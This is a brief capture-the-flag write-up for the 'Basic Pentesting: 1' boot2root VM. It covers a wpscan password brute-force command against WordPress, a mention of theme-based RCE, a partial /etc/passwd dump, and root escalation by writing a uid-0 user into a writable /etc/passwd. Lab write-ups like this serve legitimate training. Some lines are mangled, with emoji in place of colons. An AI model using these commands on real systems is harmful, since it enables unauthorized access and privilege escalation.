Basic-Pentest

By Lawcky 31/12/2023

Introduction

small boot2root VM

Difficulty : easy

Additionnal info :

Name: Basic Pentesting: 1
Release date: 8 Dec 2017
Author: Josiah Pierce
Series: Basic Pentesting

|NOTE| if you want to see all the scans we wont copy them here as they would be way too voluminous, click here to see them

---

In this write-up

• nmap
• nikto
• wpscan

---

Write-UP

anonymous ftp test

need an email address

---

Website

website seems empty on default page

/secret/

we change the /etc/hosts entry

we now have access to the site and know that it is a wordpress and it uses the twentyseventeen theme.

---

Attacking Wordpress

getting wordpress access

sudo wpscan --url http://b.pen/secret/wp-login.php --password-attack wp-login -U admin -P common.txt

RCE using wordpress themes

we know have shell access to the user www-data

we upgrade to full tty shell

---

information gathering

cat /etc/passwd

kernoops❌116:65534:Kernel Oops Tracking Daemon,😕:/bin/false pulse❌117:124:PulseAudio daemon,:/var/run/pulse:/bin/false rtkit❌118:126:RealtimeKit,:/proc:/bin/false saned❌119:127::/var/lib/saned:/bin/false usbmux❌120:46:usbmux daemon,:/var/lib/usbmux:/bin/false marlinspike❌1000:1000:marlinspike,:/home/marlinspike:/bin/bash mysql❌121:129:MySQL Server,:/nonexistent:/bin/false sshd❌122:65534::/var/run/sshd:/usr/sbin/nologin

---

Linux Enumeration

after running linpeas.sh we see different vulnerabilities, the one to stand out is :

there are two ways of using this, the first one is to remove root’s password by deleting the x in the line

root:x:0:0:root:/root:/bin/bash

the other way is to create our own user with root privileges

openssl passwd -1 we are getting an Hashed password

echo 'pwn:HASH:0:0:pwned:/root:/bin/bash' su - pwn

---